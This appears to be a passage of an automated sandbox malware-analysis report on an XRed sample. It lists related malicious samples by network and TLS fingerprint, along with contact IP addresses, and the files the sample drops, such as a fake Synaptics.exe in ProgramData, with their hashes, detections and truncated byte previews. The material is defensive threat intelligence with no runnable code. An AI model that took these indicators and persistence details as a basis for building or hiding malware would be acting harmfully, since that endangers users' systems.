	LisectAVT_2403002B_141.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_198.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_311.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_318.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_327.exe	Get hash	malicious	XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://forms.office.com/r/qq9c20HBqa	Get hash	malicious	Tycoon2FA	Browse	13.89.179.13
	EXTERNAL 9 Held.msg	Get hash	malicious	Unknown	Browse	104.47.73.28
	LisectAVT_2403002A_349.exe	Get hash	malicious	Unknown	Browse	13.107.246.42
	FW_ _EXTERNAL_ ocstock Shared Document-2.msg	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.47.73.156
	LisectAVT_2403002A_362.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://url.us.m.mimecastprotect.com/s/E8trC5yxE7iZK9MZ8-vl	Get hash	malicious	Unknown	Browse	20.81.101.200
	LisectAVT_2403002A_440.exe	Get hash	malicious	XRed	Browse	13.107.246.60
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	13.107.246.42
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	13.107.246.60
AWKNET-LLCUS	LisectAVT_2403002A_440.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_129.exe	Get hash	malicious	PureLog Stealer, XRed	Browse	69.42.215.252
	LisectAVT_2403002B_141.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_198.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_311.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_318.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_327.exe	Get hash	malicious	XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	LisectAVT_2403002A_328.exe	Get hash	malicious	Petite Virus	Browse	13.107.246.45
	LisectAVT_2403002A_328.exe	Get hash	malicious	Petite Virus	Browse	13.107.246.45
	LisectAVT_2403002A_420.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.246.45
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	LisectAVT_2403002A_428.exe	Get hash	malicious	BlackMoon	Browse	13.107.246.45
	LisectAVT_2403002A_425.dll	Get hash	malicious	Unknown	Browse	13.107.246.45
	LisectAVT_2403002A_428.exe	Get hash	malicious	BlackMoon	Browse	13.107.246.45
	LisectAVT_2403002A_440.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	13.107.246.45
37f463bf4616ecd445d4a1937da06e19	LisectAVT_2403002A_360.exe	Get hash	malicious	Unknown	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_42.exe	Get hash	malicious	GuLoader	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_440.exe	Get hash	malicious	XRed	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_467.exe	Get hash	malicious	Unknown	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_66.exe	Get hash	malicious	Troldesh / Shade	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_66.exe	Get hash	malicious	Unknown	Browse	142.250.184.238 142.250.185.65
	LisectAVT_2403002A_7.exe	Get hash	malicious	Unknown	Browse	142.250.184.238 142.250.185.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\wixstdba.dll	https://portal.vector.com/shared/8aacc900-9a36-4b0e-a5a6-c8ad0daf4733	Get hash	malicious	Unknown	Browse
	NotezillaSetup.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Synaptics\RCX822C.tmp

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_282.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	771584
Entropy (8bit):	6.636362882247521
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IFr:ansJ39LyjbJkQFMhmC+6GD92
MD5:	B753207B14C635F29B2ABF64F603570A
SHA1:	8A40E828224F22361B09494A556A20DB82FC97B9
SHA-256:	7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2
SHA-512:	0DD32803B95D53BADD33C0C84DF1002451090FF5F74736680E3A53A0BFC0E723EEE7D795626BC10A1FB431DE7E6E276C5A66349EF385A8B92B48425B0BDD036F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX822C.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX822C.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_282.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16016392
Entropy (8bit):	7.981074181960188
Encrypted:	false
SSDEEP:	196608:ULz7flpQcIIS/Rj7BWl+aV8t8z72BxBwBgO4n6018xRrdVBzIxdAANm5suXf/BAn:UTlptVYmfr7yBG/4nF8TRVBsViHmpe
MD5:	6D1FD0AF6DD71B3CA81ECEFB1D9F9324
SHA1:	7DCE009FAE200AD379A332BC4F2CC5DC8C88DF52
SHA-256:	43C1D24D64D652DBA7A789B4EB06870D5BA199060F0069B906A7B0F9ECBD4D70
SHA-512:	9847DB8A749BF940424C4E5AE8F29C459FE96AA88B95E066F53AD840A618AB9190DE3797A1116839AD2BE3DB6C973675190E5E049CCA6DAD004115D54C5FB599
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..............................................@..............................B..........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc..............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_282.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\4bzU9tWE.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\CRhqW9p.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1638), with no line terminators
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	5.26347722136378
Encrypted:	false
SSDEEP:	24:bsF+0HGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+uG+pAZewRDK4mW
MD5:	129855F58B3F7A3A511C604A7947A767
SHA1:	5856B57C19BF2AC3DEDF24E1C74E65AF4A6E7B45
SHA-256:	53C7211B3D43FE8A485A0A1B75EB4ECA740F0137DABFCE2F2A4E0686E904D0C6
SHA-512:	6C5DA58A2060EDB3CBC79EDBD1E6E4ACDC1AC38C89A77B403D5770FBA4043E9EFA826ED716141C99B114A97B81B6B08650CAE08E21B0EFC55CC3645537FF45EE
Malicious:	false
Preview:	<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t3835Akaq_UOnvVHUBaOyw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20240725160456.log

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5116
Entropy (8bit):	5.514066737108334
Encrypted:	false
SSDEEP:	96:2mivOusHfzSn3tU1I1W1F1B1m10171eGuUQ0ifUXtFTFquFwFZuFxF0uFNFYu7At:ivOus/zSn+1I1W1F1B1m10171zU2ppy1
MD5:	2D76696FF9E089E6A34373A6C00AA314
SHA1:	165F59724BE73E3293483E0F45158554BC1705F7
SHA-256:	3E756D9B4D53A1529D9A9BF962C9D036531979EA78D1711FA1EB5C990513F28B
SHA-512:	9615BCD7DCB54739738D1D80E269F0A076D0584395B40F6B7BE2F6FB7BF2E136C8CF1E5232D50C231B9FF8B1A7CF2FF85DCDD854BBAEA69CFA8A557DCF6C00D0
Malicious:	false
Preview:	[1B28:1B48][2024-07-25T16:04:56]i001: Burn v3.7.3813.0, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe, cmdline: '-burn.unelevated BurnPipe.{D1F32E49-3F7D-4852-BF07-482476425E70} {3ABCDB34-CFB2-4087-949E-3896BDF3C63B} 6884'..[1B28:1B48][2024-07-25T16:04:56]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20240725160456.log'..[1B28:1B48][2024-07-25T16:04:56]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe'..[1B28:1B48][2024-07-25T16:04:56]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1B28:1B48][2024-07-25T16:04:56]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429'..[1B28:1B48][2024-07-25T16:04:57]i100: Detect begin, 10 packages..[1B28:1B48][2024-07-25T16:04:57]i000: Setting ve

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1028\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	172194
Entropy (8bit):	5.01638369375568
Encrypted:	false
SSDEEP:	1536:2xLiaxbgAMR+MoewktKFDbzJSCPByCy2FWrNj9v:UEoeweBC5+2gh
MD5:	7414872AED21B507D527D2CA8C7E9AAB
SHA1:	D6B8E6418AC69EA337342308D7003AEDFBCED84F
SHA-256:	AC301B888DE1618AB3EB15EA3DFCD6EAE0860BB00715F7E6141DA882712B33DB
SHA-512:	C7D67AC35389EC31673259FEC88EE7549584EAC8685688D524C7A615EF1F738D12CCD6D4244A88B418622BD2374B9A612EAB29161544AEB0A0F5F3BC1891D7FB
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch14\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}..{\f14\fbidi \froman\fcharset136\fprq2{\\panose 02020500000000000000}PMingLiU{\\falt PMingLiU};}{\f15\fbidi \fmodern\fcharset128\fprq1{\\panose 020b0609070205080204}MS Gothic{\\falt ?l?r ?S?V?b?N};}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}{\f42\fbidi \fswiss\fcharset

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1028\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2980
Entropy (8bit):	6.163758160900388
Encrypted:	false
SSDEEP:	48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
MD5:	472ABBEDCBAD24DBA5B5F5E8D02C340F
SHA1:	974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
SHA-256:	8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
SHA-512:	676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ................. ......................../passive \| /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1029\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	152078
Entropy (8bit):	5.035620146528953
Encrypted:	false
SSDEEP:	1536:xfLmkIoRprLx/17d1T0CcXcKefPirSh9P:F51jZ1N
MD5:	5712AB5A66835E73400096F7836AF501
SHA1:	D293DDDC23F1564B5205F864DE05FE0E9D5B49A3
SHA-256:	9B8E4D28836F1E65F58E6AA189F126C38416F9607D59C75386D3CD5DD67A32F2
SHA-512:	EA1CA52513CFB1073D97B7C3F8B20B12359351FD572126774EEB98BEFA03D171DA875E4E87C93D6CB5A784B6A024CB5776741F896BF68FBEA7F4304AEA0BA50D
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1029\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3333
Entropy (8bit):	5.370651462060085
Encrypted:	false
SSDEEP:	48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
MD5:	16343005D29EC431891B02F048C7F581
SHA1:	85A14C40C482D9351271F6119D272D19407C3CE9
SHA-256:	07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
SHA-512:	FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive \| /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1031\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	139352
Entropy (8bit):	5.0617193292475084
Encrypted:	false
SSDEEP:	768:xIMDeLPi1m0h55sRL/4gQ/INd/SxdO38oklOKOIhTPP5AKqpUZMav1SpaWoPglRX:x7k4+QoRBvxiZ1jp4NKzMyA9br7h9P
MD5:	554065EA0EC2B18ADBD3B55DB3D2CE79
SHA1:	D9146A7D69FA8B1FF783CB414E6DAB8E12550101
SHA-256:	E7A2A0A772AD2E0A9208A15C4843C9ED742F81F51ADE4904B55B2524D046988D
SHA-512:	1CC06AF2ADE89327264F5D9646259BE0DD418F725049886881E446DBB76A0970407E04FA6DCB095DECF743C0FFA37AFD36E291FAA0B771ED743EBFAF965AE289
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1031\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3379
Entropy (8bit):	5.094097800535488
Encrypted:	false
SSDEEP:	48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
MD5:	561F3F32DB2453647D1992D4D932E872
SHA1:	109548642FB7C5CC0159BEDDBCF7752B12B264C0
SHA-256:	8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
SHA-512:	CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive \| /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1036\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	141006
Entropy (8bit):	5.045856494683462
Encrypted:	false
SSDEEP:	1536:xna+IUURZjHM2MDmdok34Pd4o2qtnAih9v:JksXnTR
MD5:	91E000FDEBE660F8EC8C670405BEDA1F
SHA1:	8BAA6E62E1C5BA6EA5BA76E38722283217B21282
SHA-256:	B4FF92D5C197E82F52A4E3367338E7CFB449E6DD2771F6E1B5C30687739DE511
SHA-512:	CCBBDDF424AE7746A48C3E108621E33360A67FB166039AD6D3C9F8A6374B86DD9380ABD4064279FC36CC8AF18832603B3028A5EBD6A861DBC030232790E8C88D
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1036\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3366
Entropy (8bit):	5.0912204406356905
Encrypted:	false
SSDEEP:	48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
MD5:	7B46AE8698459830A0F9116BC27DE7DF
SHA1:	D9BB14D483B88996A591392AE03E245CAE19C6C3
SHA-256:	704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
SHA-512:	FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
Malicious:	false
